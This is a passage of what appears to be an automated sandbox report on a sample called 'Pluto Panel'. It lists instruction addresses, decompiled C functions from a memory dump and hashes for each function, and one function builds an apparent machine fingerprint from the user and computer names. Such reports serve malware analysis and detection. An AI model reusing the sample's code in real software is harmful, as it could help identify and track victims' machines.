                                                                                                          0x00f7e91f
                                                                                                          0x00f7e929
                                                                                                          0x00f7e933
                                                                                                          0x00f7e93d
                                                                                                          0x00f7e947
                                                                                                          0x00f7e951
                                                                                                          0x00f7e95b
                                                                                                          0x00f7e965
                                                                                                          0x00f7e968
                                                                                                          0x00f7e96c
                                                                                                          0x00f7e96e
                                                                                                          0x00f7e972
                                                                                                          0x00f7e97c
                                                                                                          0x00f7e986
                                                                                                          0x00f7e990
                                                                                                          0x00f7e99a
                                                                                                          0x00f7e9a4
                                                                                                          0x00f7e9ae
                                                                                                          0x00f7e9b8
                                                                                                          0x00f7e9c2
                                                                                                          0x00f7e9cc
                                                                                                          0x00f7e9d6
                                                                                                          0x00f7e9e0
                                                                                                          0x00f7e9ea
                                                                                                          0x00f7e9f4
                                                                                                          0x00f7e9fe
                                                                                                          0x00f7ea08
                                                                                                          0x00f7ea12
                                                                                                          0x00f7ea1c
                                                                                                          0x00f7ea23
                                                                                                          0x00f7ea2a
                                                                                                          0x00f7ea31
                                                                                                          0x00f7ea38
                                                                                                          0x00f7ea3f
                                                                                                          0x00f7ea46
                                                                                                          0x00f7ea4d
                                                                                                          0x00f7ea54
                                                                                                          0x00f7ea5b
                                                                                                          0x00f7ea62
                                                                                                          0x00f7ea69
                                                                                                          0x00f7ec57
                                                                                                          0x00f7ec5a
                                                                                                          0x00f7ec60
                                                                                                          0x00f7ec63
                                                                                                          0x00f7ec76
                                                                                                          0x00f7ec6f
                                                                                                          0x00f7ec6f
                                                                                                          0x00000000
                                                                                                          0x00f7ec6f
                                                                                                          0x00f7ec63
                                                                                                          0x00f7ea70
                                                                                                          0x00f7ea7f
                                                                                                          0x00f7ea82
                                                                                                          0x00f7ea86
                                                                                                          0x00f7ea89
                                                                                                          0x00f7ec06
                                                                                                          0x00f7ec0a
                                                                                                          0x00f7ec44
                                                                                                          0x00f7ec47
                                                                                                          0x00f7ec10
                                                                                                          0x00f7ec13
                                                                                                          0x00f7ec18
                                                                                                          0x00f7ec1c
                                                                                                          0x00f7ec21
                                                                                                          0x00f7ec28
                                                                                                          0x00f7ec28
                                                                                                          0x00f7ec21
                                                                                                          0x00f7ec2a
                                                                                                          0x00f7ec2a
                                                                                                          0x00f7ec48
                                                                                                          0x00f7ec49
                                                                                                          0x00f7ec49
                                                                                                          0x00f7ec50
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7ec50
                                                                                                          0x00f7ea8f
                                                                                                          0x00f7ea92
                                                                                                          0x00f7ea95
                                                                                                          0x00f7ea95
                                                                                                          0x00f7ea99
                                                                                                          0x00f7ea9e
                                                                                                          0x00f7ea9f
                                                                                                          0x00f7eaa3
                                                                                                          0x00f7eaa6
                                                                                                          0x00f7eaa9
                                                                                                          0x00f7eaae
                                                                                                          0x00f7eab3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eab5
                                                                                                          0x00f7eab9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eabb
                                                                                                          0x00f7eac3
                                                                                                          0x00f7ebce
                                                                                                          0x00f7ebce
                                                                                                          0x00f7ebd2
                                                                                                          0x00f7ebd5
                                                                                                          0x00f7ebdc
                                                                                                          0x00f7ebdd
                                                                                                          0x00f7ebe0
                                                                                                          0x00f7ebe5
                                                                                                          0x00f7ebe7
                                                                                                          0x00f7ebe8
                                                                                                          0x00f7ebeb
                                                                                                          0x00f7ebee
                                                                                                          0x00f7ebf3
                                                                                                          0x00f7ebf8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7ebfa
                                                                                                          0x00f7ec01
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7ec03
                                                                                                          0x00000000
                                                                                                          0x00f7ec03
                                                                                                          0x00f7ec37
                                                                                                          0x00f7ec3a
                                                                                                          0x00f7ec3b
                                                                                                          0x00000000
                                                                                                          0x00f7ec3b
                                                                                                          0x00f7eac9
                                                                                                          0x00f7eac9
                                                                                                          0x00f7eacd
                                                                                                          0x00f7ead2
                                                                                                          0x00f7eb83
                                                                                                          0x00f7eb83
                                                                                                          0x00f7eb87
                                                                                                          0x00f7eb89
                                                                                                          0x00f7eb98
                                                                                                          0x00f7eb98
                                                                                                          0x00f7eb9c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb8f
                                                                                                          0x00f7eba1
                                                                                                          0x00f7eba3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eba5
                                                                                                          0x00f7eba6
                                                                                                          0x00f7ebaa
                                                                                                          0x00f7ebab
                                                                                                          0x00f7ebb4
                                                                                                          0x00f7ebb9
                                                                                                          0x00f7ebc1
                                                                                                          0x00f7ebc4
                                                                                                          0x00f7ebc7
                                                                                                          0x00f7ebc8
                                                                                                          0x00000000
                                                                                                          0x00f7ebc8
                                                                                                          0x00f7eb91
                                                                                                          0x00f7eb95
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb97
                                                                                                          0x00f7eb97
                                                                                                          0x00f7eb9e
                                                                                                          0x00000000
                                                                                                          0x00f7eae1
                                                                                                          0x00f7eae1
                                                                                                          0x00f7eae3
                                                                                                          0x00f7eb09
                                                                                                          0x00f7eb09
                                                                                                          0x00f7eb0d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb00
                                                                                                          0x00f7eb7e
                                                                                                          0x00f7eb13
                                                                                                          0x00f7eb17
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb25
                                                                                                          0x00f7eb2d
                                                                                                          0x00f7eb32
                                                                                                          Instruction addresses for the preceding C-Code listing:
                                                                                                          0x00f7eb36 0x00f7eb3b 0x00f7eb46 0x00f7eb55 0x00f7eb5d 0x00f7eb5e 0x00f7eb62 0x00f7eb6e 0x00f7eb74 0x00f7eb75
                                                                                                          0x00000000 0x00f7eb75 0x00f7eb02 0x00f7eb06 0x00000000 0x00000000 0x00f7eb08 0x00f7eb08 0x00f7eb0f 0x00000000
                                                                                                          0x00f7eb0f 0x00f7ead2 0x00f7eaee 0x00f7eaf4 0x00f7eaf5 0x00000000 0x00f7eaf5 0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
                                                                                                          • API String ID: 0-2473593039
                                                                                                          • Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                                          • Instruction ID: eecf81e627f2af7111bbfa1a82eadee9153d894015daf30dcb4595cf117ce4a9
                                                                                                          • Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                                          • Instruction Fuzzy Hash: 22F144B0C002599EDB21CF94D8487DEBFB0AB9A318F54C1CAD5583B241C7B90AC9DF99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 21%
                                                                                                          			E00F71478(void* __ecx, void* __fp0) {
                                                                                                          				void* __esi;
                                                                                                          				void* _t57;
                                                                                                          				void* _t58;
                                                                                                          				void* _t65;
                                                                                                          				void* _t68;
                                                                                                          				void* _t71;
                                                                                                          				void* _t84;
                                                                                                          				signed int _t87;
                                                                                                          				void* _t89;
                                                                                                          				signed int _t93;
                                                                                                          				intOrPtr _t97;
                                                                                                          				intOrPtr _t98;
                                                                                                          				void* _t100;
                                                                                                          				void* _t102;
                                                                                                          				void* _t103;
                                                                                                          				void* _t105;
                                                                                                          				void* _t111;
                                                                                                          
                                                                                                          				_t111 = __fp0;
                                                                                                          				_t89 = __ecx;
                                                                                                          				_t100 = _t102 - 0x6c;
                                                                                                          				_t103 = _t102 - 0x474;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
                                                                                                          				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
                                                                                                          				_t87 = 0;
                                                                                                          				do {
                                                                                                          					_push(0x7f);
                                                                                                          					_push(0);
                                                                                                          					_push(_t100 - 0x63);
                                                                                                          					 *((char*)(_t100 - 0x64)) = 0;
                                                                                                          					L00F803F4();
                                                                                                          					_push(_t100 - 0x64);
                                                                                                          					_t93 = _t87 << 2;
                                                                                                          					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
                                                                                                          					_push( *((intOrPtr*)(_t100 + 0x78)));
                                                                                                          					_t57 = 0x7f;
                                                                                                          					_t58 = E00F7D9F2(_t57, _t89);
                                                                                                          					_t103 = _t103 + 0x18;
                                                                                                          					if(_t58 == 0) {
                                                                                                          						E00F7104A(_t100 - 0x408);
                                                                                                          						_push(_t100 - 0x64);
                                                                                                          						_push(_t100 - 0x1f4);
                                                                                                          						L00F803FA();
                                                                                                          						_t97 =  *((intOrPtr*)(_t100 + 0x78));
                                                                                                          						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
                                                                                                          						_t34 = _t87 + 1; // 0x1
                                                                                                          						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
                                                                                                          						_push(_t100 - 0x2f8);
                                                                                                          						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
                                                                                                          						_push(_t97);
                                                                                                          						_t65 = 0x7f;
                                                                                                          						E00F7D9F2(_t65, _t89);
                                                                                                          						_push(_t100 - 0x3fc);
                                                                                                          						_push(0x41274c);
                                                                                                          						_push(_t97);
                                                                                                          						_t68 = 0x7f;
                                                                                                          						E00F7D9F2(_t68, _t89);
                                                                                                          						_push(_t100 - 0x378);
                                                                                                          						_push(0x412760);
                                                                                                          						_push(_t97);
                                                                                                          						_t71 = 0x7f;
                                                                                                          						E00F7D9F2(_t71, _t89);
                                                                                                          						_t105 = _t103 + 0x2c;
                                                                                                          						if(_t87 != 3) {
                                                                                                          							_push(_t100 - 0x278);
                                                                                                          							_push(0x412664);
                                                                                                          							_push(_t97);
                                                                                                          							_t84 = 0x7f;
                                                                                                          							E00F7D9F2(_t84, _t89);
                                                                                                          							_t105 = _t105 + 0xc;
                                                                                                          						}
                                                                                                          						E00F7D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
                                                                                                          						E00F7D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
                                                                                                          						_t103 = _t105 + 0x18;
                                                                                                          						_t98 =  *((intOrPtr*)(_t100 + 0x74));
                                                                                                          						E00F712DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
                                                                                                          						_push(_t98 + 0xa9c);
                                                                                                          						_push(_t100 - 0xf4);
                                                                                                          						L00F803FA();
                                                                                                          						_pop(_t89);
                                                                                                          						_t58 = E00F71279(_t100 - 0x408, _t111, _t98);
                                                                                                          					}
                                                                                                          					_t87 = _t87 + 1;
                                                                                                          				} while (_t87 < 4);
                                                                                                          				return _t58;
                                                                                                          			}

                                                                                                          Instruction addresses for the C-Code listing above:
                                                                                                          0x00f71478 0x00f71478 0x00f71479 0x00f7147d 0x00f71486 0x00f7148d 0x00f71494 0x00f7149b 0x00f714a2 0x00f714a9
                                                                                                          0x00f714b0 0x00f714b7 0x00f714be 0x00f714c5 0x00f714cc 0x00f714d3 0x00f714da 0x00f714e1 0x00f714e8 0x00f714ef
                                                                                                          0x00f714f6 0x00f714fd 0x00f71504 0x00f7150b 0x00f71512 0x00f71514 0x00f71514 0x00f71519 0x00f7151b 0x00f7151c
                                                                                                          0x00f71520 0x00f71528 0x00f7152b 0x00f7152e 0x00f71532 0x00f71537 0x00f71538 0x00f7153d 0x00f71542 0x00f7154e
                                                                                                          0x00f71556 0x00f7155d 0x00f7155e 0x00f71566 0x00f71569 0x00f7156f 0x00f71572 0x00f7157e 0x00f7157f 0x00f71583
                                                                                                          0x00f71586 0x00f71587 0x00f71592 0x00f71593 0x00f71598 0x00f7159b 0x00f7159c 0x00f715a7 0x00f715a8 0x00f715ad
                                                                                                          0x00f715b0 0x00f715b1 0x00f715b6 0x00f715bc 0x00f715c4 0x00f715c5 0x00f715ca 0x00f715cd 0x00f715ce 0x00f715d3
                                                                                                          0x00f715d3 0x00f715df 0x00f715ed 0x00f715f2 0x00f71603 0x00f71608 0x00f71613 0x00f7161a 0x00f7161b 0x00f71621
                                                                                                          0x00f71629 0x00f71629 0x00f7162e 0x00f7162f 0x00f7163f

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                                                          • API String ID: 0-3237638986
                                                                                                          • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                                          • Instruction ID: ae8d4cecc56871c7ff5c996911cb6fde34f9537649d3f1063ee081ee9ae98bb9
                                                                                                          • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                                          • Instruction Fuzzy Hash: A44173B190021CABDB20DF90CD45ADE3BB8EF14304F508566FA1CD7151D7B89A98CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 45%
                                                                                                          			E00F760BE(signed int _a4) {
                                                                                                          				char _v5;
                                                                                                          				char _v6;
                                                                                                          				char _v7;
                                                                                                          				char _v8;
                                                                                                          				char _v9;
                                                                                                          				char _v10;
                                                                                                          				char _v11;
                                                                                                          				char _v12;
                                                                                                          				char _v13;
                                                                                                          				char _v14;
                                                                                                          				char _v15;
                                                                                                          				char _v16;
                                                                                                          				char _v17;
                                                                                                          				char _v18;
                                                                                                          				char _v19;
                                                                                                          				char _v20;
                                                                                                          				char _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				intOrPtr _v32;
                                                                                                          				intOrPtr _v36;
                                                                                                          				char _v291;
                                                                                                          				char _v292;
                                                                                                          				char _v547;
                                                                                                          				char _v548;
                                                                                                          				char _v1058;
                                                                                                          				char _v1060;
                                                                                                          				char _v1570;
                                                                                                          				char _v1572;
                                                                                                          				char* _t81;
                                                                                                          				char* _t82;
                                                                                                          				signed int _t84;
                                                                                                          				signed int _t85;
                                                                                                          				signed int _t87;
                                                                                                          				signed int _t89;
                                                                                                          				signed int _t92;
                                                                                                          				signed int _t97;
                                                                                                          				intOrPtr* _t102;
                                                                                                          				signed short* _t103;
                                                                                                          				intOrPtr _t106;
                                                                                                          				void* _t107;
                                                                                                          
                                                                                                          				_t85 = 0;
                                                                                                          				_v20 = 0xa3;
                                                                                                          				_v19 = 0x1e;
                                                                                                          				_v18 = 0xf3;
                                                                                                          				_v17 = 0x69;
                                                                                                          				_v16 = 7;
                                                                                                          				_v15 = 0x62;
                                                                                                          				_v14 = 0xd9;
                                                                                                          				_v13 = 0x1f;
                                                                                                          				_v12 = 0x1e;
                                                                                                          				_v11 = 0xe9;
                                                                                                          				_v10 = 0x35;
                                                                                                          				_v9 = 0x7d;
                                                                                                          				_v8 = 0x4f;
                                                                                                          				_v7 = 0xd2;
                                                                                                          				_v6 = 0x7d;
                                                                                                          				_v5 = 0x48;
                                                                                                          				_v292 = 0;
                                                                                                          				L00F803F4();
                                                                                                          				_v548 = 0;
                                                                                                          				L00F803F4();
                                                                                                          				_v1572 = 0;
                                                                                                          				L00F803F4();
                                                                                                          				_v1060 = 0;
                                                                                                          				L00F803F4();
                                                                                                          				_v36 = _a4 + 4;
                                                                                                          				_a4 = 0;
                                                                                                          				_v24 = 0xff;
                                                                                                          				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
                                                                                                          				_v24 = 0xff;
                                                                                                          				 *0x412018( &_v548,  &_v24);
                                                                                                          				_t102 =  *0x4120d0;
                                                                                                          				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                                          				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                                          				_t81 =  &_v292;
                                                                                                          				_push(_t81);
                                                                                                          				L00F803B6();
                                                                                                          				_v32 = _t81;
                                                                                                          				_t82 =  &_v548;
                                                                                                          				_push(_t82);
                                                                                                          				L00F803B6();
                                                                                                          				_t106 = _v36;
                                                                                                          				_v28 = _t82;
                                                                                                          				_push(0x10);
                                                                                                          				_push( &_v20);
                                                                                                          				_push(_t106);
                                                                                                          				L00F8043C();
                                                                                                          				_t84 = 0xba0da71d;
                                                                                                          				if(_v28 > 0) {
                                                                                                          					_t103 =  &_v1060;
                                                                                                          					do {
                                                                                                          						_t97 = _a4 & 0x80000003;
                                                                                                          						if(_t97 < 0) {
                                                                                                          							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                          						}
                                                                                                          						_t89 = ( *_t103 & 0x0000ffff) * _t84;
                                                                                                          						_t84 = _t84 * 0xbc8f;
                                                                                                          						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
                                                                                                          						_a4 = _a4 + 1;
                                                                                                          						_t103 =  &(_t103[1]);
                                                                                                          					} while (_a4 < _v28);
                                                                                                          				}
                                                                                                          				if(_v32 > _t85) {
                                                                                                          					do {
                                                                                                          						_t92 = _a4 & 0x80000003;
                                                                                                          						if(_t92 < 0) {
                                                                                                          							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                          						}
                                                                                                          						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
                                                                                                          						_t84 = _t84 * 0xbc8f;
                                                                                                          						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
                                                                                                          						_a4 = _a4 + 1;
                                                                                                          						_t85 = _t85 + 1;
                                                                                                          					} while (_t85 < _v32);
                                                                                                          				}
                                                                                                          				return _t84;
                                                                                                          			}


                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                          • API String ID: 0-3760989150
                                                                                                          • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                                          • Instruction ID: abfd86182514714b9cd0d83e6a934614f71e27a478e83c6518f788ee169f695d
                                                                                                          • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                                          • Instruction Fuzzy Hash: 4F51D87180025DAEDF11DBA8CC40AEEBBBCEF49314F0482E9E559E6192D7389B44CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 83%
                                                                                                          			E00F71642(void* __fp0) {
                                                                                                          				void* __esi;
                                                                                                          				void* _t65;
                                                                                                          				signed int _t89;
                                                                                                          				void* _t92;
                                                                                                          				intOrPtr _t106;
                                                                                                          				void* _t108;
                                                                                                          				void* _t110;
                                                                                                          				void* _t111;
                                                                                                          				void* _t118;
                                                                                                          
                                                                                                          				_t118 = __fp0;
                                                                                                          				_t108 = _t110 - 0x70;
                                                                                                          				_t111 = _t110 - 0x474;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
                                                                                                          				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
                                                                                                          				_t89 = 0;
                                                                                                          				do {
                                                                                                          					_push(0x7f);
                                                                                                          					_push(0);
                                                                                                          					_push(_t108 - 0x5f);
                                                                                                          					 *((char*)(_t108 - 0x60)) = 0;
                                                                                                          					L00F803F4();
                                                                                                          					_t111 = _t111 + 0xc;
                                                                                                          					_t97 = _t89 << 2;
                                                                                                          					_t65 = E00F71819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
                                                                                                          					if(_t65 != 0) {
                                                                                                          						E00F7104A(_t108 - 0x404);
                                                                                                          						_push(_t108 - 0x60);
                                                                                                          						_push(_t108 - 0x1f0);
                                                                                                          						L00F803FA();
                                                                                                          						_pop(_t92);
                                                                                                          						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
                                                                                                          						_t37 = _t89 + 1; // 0x1
                                                                                                          						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
                                                                                                          						E00F71819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
                                                                                                          						E00F71819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
                                                                                                          						E00F71819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
                                                                                                          						if(_t89 != 3) {
                                                                                                          							E00F71819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
                                                                                                          							E00F7D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
                                                                                                          							_t111 = _t111 + 0xc;
                                                                                                          						}
                                                                                                          						E00F7D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
                                                                                                          						E00F7D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
                                                                                                          						_t106 =  *((intOrPtr*)(_t108 + 0x78));
                                                                                                          						_t111 = _t111 + 0x18;
                                                                                                          						E00F712DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
                                                                                                          						_push(_t106 + 0xa9c);
                                                                                                          						_push(_t108 - 0xf0);
                                                                                                          						L00F803FA();
                                                                                                          						_t65 = E00F71279(_t108 - 0x404, _t118, _t106);
                                                                                                          					}
                                                                                                          					_t89 = _t89 + 1;
                                                                                                          				} while (_t89 < 4);
                                                                                                          				return _t65;
                                                                                                          			}

                                                                                                          0x00f71642
                                                                                                          0x00f71643
                                                                                                          0x00f71647
                                                                                                          0x00f71650
                                                                                                          0x00f71657
                                                                                                          0x00f7165e
                                                                                                          0x00f71665
                                                                                                          0x00f7166c
                                                                                                          0x00f71673
                                                                                                          0x00f7167a
                                                                                                          0x00f71681
                                                                                                          0x00f71688
                                                                                                          0x00f7168f
                                                                                                          0x00f71696
                                                                                                          0x00f7169d
                                                                                                          0x00f716a4
                                                                                                          0x00f716ab
                                                                                                          0x00f716b2
                                                                                                          0x00f716b9
                                                                                                          0x00f716c0
                                                                                                          0x00f716c7
                                                                                                          0x00f716ce
                                                                                                          0x00f716d5
                                                                                                          0x00f716dc
                                                                                                          0x00f716de
                                                                                                          0x00f716de
                                                                                                          0x00f716e3
                                                                                                          0x00f716e5
                                                                                                          0x00f716e6
                                                                                                          0x00f716ea
                                                                                                          0x00f716ef
                                                                                                          0x00f716f4
                                                                                                          0x00f71701
                                                                                                          0x00f71708
                                                                                                          0x00f71714
                                                                                                          0x00f7171c
                                                                                                          0x00f71723
                                                                                                          0x00f71724
                                                                                                          0x00f71733
                                                                                                          0x00f71738
                                                                                                          0x00f71741
                                                                                                          0x00f7174a
                                                                                                          0x00f71750
                                                                                                          0x00f71763
                                                                                                          0x00f71776
                                                                                                          0x00f7177e
                                                                                                          0x00f7178e
                                                                                                          0x00f7179f
                                                                                                          0x00f717a4
                                                                                                          0x00f717a4
                                                                                                          0x00f717b2
                                                                                                          0x00f717c2
                                                                                                          0x00f717c7
                                                                                                          0x00f717ca
                                                                                                          0x00f717df
                                                                                                          0x00f717ea
                                                                                                          0x00f717f1
                                                                                                          0x00f717f2
                                                                                                          0x00f71800
                                                                                                          0x00f71800
                                                                                                          0x00f71805
                                                                                                          0x00f71806
                                                                                                          0x00f71816

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                                                          • API String ID: 0-2857912252
                                                                                                          • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                          • Instruction ID: 735994f9aabb602cd868e408b640ea5ec7e3f6be88ecc496dc3ed47337b23c79
